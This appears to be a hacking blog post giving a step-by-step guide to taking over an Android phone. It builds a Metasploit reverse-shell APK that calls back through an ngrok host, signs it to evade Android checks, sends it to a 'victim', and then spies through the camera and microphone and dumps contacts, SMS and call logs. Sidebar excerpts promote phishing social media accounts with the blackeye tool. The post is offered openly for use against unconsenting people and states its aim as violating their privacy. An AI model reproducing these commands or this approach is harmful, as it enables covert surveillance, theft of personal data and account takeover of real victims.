How to hack Android Remotely Using Kali/Windows/Mac (Step-By-Step Tutorial)

-

 Detailed Tutorial On How To Remotely Hack Android Device

Note :- Follow each steps carefully then you can successfully do it, but
if you get any error. Don't forget to mention it in comments.

1.Download Metasploit-framework
If you are on a Linux machine (Kali or Parrot), It comes pre-installed.
Else, you can download it on Windows and Mac too from metasploit.com

2.Downlaod Ngrok

If you don't know what ngrok is, ngrok is a port-forwarding tool which can transfer WAN Connections on LAN. You can download it from ngrok.com. And sign up for service, you can see further steps on their websites itself to install it.

3.Make your payload

Now, comes the main step to finally build our malicious .apk file to send to the victim and hack it.

For this, you'll first have to fire up ngrok terminal by this command

ngrok tcp 4242


You will get a screen like this one below



Here, as you can see my host is 8.tcp.ngrok.io and port is 19466 (This can be different in your device)

Leave the server running and open up a new terminal and we will now create our app

To do this, navigate to bin folder of Metasploit (on windows) or you can directly do it in Linux.

Type this command to create our apk

msfvenom -p android/meterpreter/reverse_tcp lhost=<your ngrok host like 8.tcp.ngrok.io> lport=<your ngrok port like 19466> r> nameOfYourApk.apk

In my case, this command will look like this,

msfvenom -p android/meterpreter/reverse_tcp lhost=8.tcp.ngrok.io lport=19466 r> androhack.apk 

Bam! We created our apk file (you can find it in the same folder)

4.Fire Up Msfconsole

 Type 'msfconsole' to launch metasploit-framework's console (it can may take some time)

Once you've successfully launched it, head to the next step, now type

use exploit/multi/handler

(It will tell msf to use this exploit)

next command,

set PAYLOAD android/meterpreter/reverse_tcp

 Now, we will have to define the host and the port for it

to do so, 

set LHOST 0.0.0.0

(LHOST stands for Listening Host)

next one, 

set LPORT 4242 

Now you are all set to forward our apk, but just one more step

Type, 'exploit' and hit enter

Note :- The next is only required if you want to hack Android 8 or later (Like 10 or 11)

As Android 7 has a little less security than Android 10 you need not to sign your apk file, but if you aim to hack android 8,9,10,11. You will have to sign our apk file so that android system doesn't flag this

To sign our apk file without an android developer certificate, we can download an app called MiX file explorer and apk signer (add-on to sign files)

You can download MiX and MiX apk signer add-on from any site

Now transfer that file to your android phone in which you have download MiX

And then long press on apk file


As you will scroll down the list you can see an option called sign

Long press on it and choose auto, It will create a new apk file for you

Now forward that newly created apk file to your victim and

BANG!!!

As your victim will click on that apk file, you will receive a meterpreter session on your computer.

You can type help to see all commands

Some common commands are

upload, download, file commands, wakelock

You can hack their camera and take a picture from it, live stream from it, screen share, record audio from their mic, download their contacts (dump_contacts), download their sms (dump_sms), download their calllog(dump_calllog).


I know these are a lot for a beginner to understand, but just think of what you want to do, hack android device, fuck their security and privacy.

If you followed the above mentioned steps carefully, there are no chances of errors, but still if you are stuck at any point, want any other help, have any feedback for me, don't forget to mention it in comments.

Comments

Post a Comment

Popular posts from this blog

Best way to hack any social media

-
Image
  Hey! Today, you gonna learn that how you can hack 30+ Social media accounts including Instagram, Facebook and WhatsApp too.... So let's get started :  There are many ways to hack any social media account like Brute-force, hashing and many more... But we will be going to use the best of these method which is very old but still working better than any other method. So, to hack victim's social media, you will need Kali linux or Termux (If you are on Android). First of all, we will need to install a tool : Blackeye Blackeye comes with already built-in phishing pages for many sites, so you won't have to create one on your own. To install blackeye :  git clone https://github.com/x3rz/blackeye  Now, you have successfully installed blackeye, now you will have to simply run it To do this,  cd blackeye  (change current directory to blackeye) Next, we will run blackeye :  bash blackeye.sh Now, you'll see a screen like this  Now, as you can see here are 33 ...
Read more

How to hack Android Device remotely

-
Image
  Hey there! So, if  you want to get remote access to any Android device whether it's A7 or A10 or maybe A11. These are the simple steps to get you access you to any android device What you need for this? A PC and Metasploit-Framework installed in it. Kali comes with pre-installed Metasploit but if you are on windows and don't have it. Then read this article to learn  how to install metasploit framework in windows7/8/10  . Now, as you have Metasploit-framework, fire up CMD (windows) or Terminal (mac/Linux). Now type these commands to remotely hack android device. 1.ifconfig (mac/Linux) ipconfig (windows). You will se an output like this, now copy your IP address. We have to run a server on our machine to receive TCP signals. Type :  'service apache2 start' (Linux/mac)   in windows, you can use any port forwarding application like ngrok if you don't know how to use it, read this article about  how to port forward in windows  . Now, it's time to cre...
Read more

How to install metasploit-framework in Windows (7/8/10)

-
Image
How to install Metasploit in Windows (7/8/10) If you also want to use metasploit, but you are on a windows machine, then the best thing you can do is to install VirtualBox and Kali Linux in VirtualBox. But as it takes a lot of time and patience, so here's a quick solution for this. The process is way more simple than you think, you have to go to  metasploit.com  and download the latest windows installer from there itself. To use msfconsole directly from CMD, you will have to add metasploit to path,  Type in the search bar, 'view advanced system settings' and press enter. Click on 'Environment Variables' below. Now, add the path of the bin folder where you have installed metasploit-framework, By default, the path is 'c\metasploit-framework\bin\'. Hurray!!!!! You have successfully installed Metasploit-framework in your windows computer. If you have followed all the steps above, there should be any error, but if you faced any errors in installation, kindly drop...
Read more